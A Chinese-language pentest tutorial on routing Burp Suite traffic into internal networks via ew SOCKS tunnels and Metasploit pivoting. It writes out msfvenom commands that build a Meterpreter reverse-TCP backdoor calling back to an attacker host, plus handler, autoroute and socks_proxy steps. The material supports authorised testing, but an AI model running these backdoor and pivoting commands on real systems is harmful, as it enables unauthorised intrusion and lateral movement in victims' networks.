場景1:
通過VPN代理進入內網測試web時需要掛burp抓包改包,掛vpn直接訪問的話、burp可以截到包但是無法正常訪問到,這個時候我們可以配置上游代理進行抓包。
解決辦法
設置方式1:
通過burp走上游代理burp->本地8080->本地系統代理->目標地址
配置burp
1.攔截包處和以前一樣,在用戶配置User Option處配置websocket,配置一個本地的socks代理
2.本地開一個socks代理,目的讓瀏覽器的流量先走到本地的全局代理—》通過本地的全局代理通過vpn走到目標地址。
下載ew
https://github.com/idlefire/ew
ew.exe -s ssocksd -l 8888
3.配置全局代理
使用socks代理工具開一個全局代理,再抓包就ok了。
設置方式2:
在實際環境中,使用msf設置代理跨網段訪問時,用的是socks4a模塊現在的最新版本的msf這個工具已經把socks4a模塊集合到socks模塊里面。
代理的通信經過流程
本地
127.0.0.1:8080 ->localhost:25378->192.168.0.190:1080->10.10.10.130:80
首先生成后門
msfvenom-p windows/meterpreter/reverse_tcp lhost=192.168.0.190 lport=4455 -fexe >r.exe
設置msf監聽模塊
msfconsole use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.0.190 set lport 4455 exploit
設置web服務器
sudo python -m SimpleHTTPServer 80
設置路由
run autoroute -s 10.10.10.0/24
使用socks_proxy模塊
backgroupd useauxiliary/server/socks_proxy setversion 4a run
使用SocksCap64設置代理隧道
192.168.0.190 1080
將火狐瀏覽器 代理到隧道中打開瀏覽目標網站
啟動本地系統代理25378
設置頂級代理訪問內網
抓包測試
場景2
burpsuite對內網的web系統進行漏洞掃描,或者進行測試,需要設置代理進行訪問內網。
burpsuite設置socks5代理訪問內網
使用ew開啟socks5代理
ew_for_Win.exe-s ssocksd -l 1080

訪問內網10段的80端口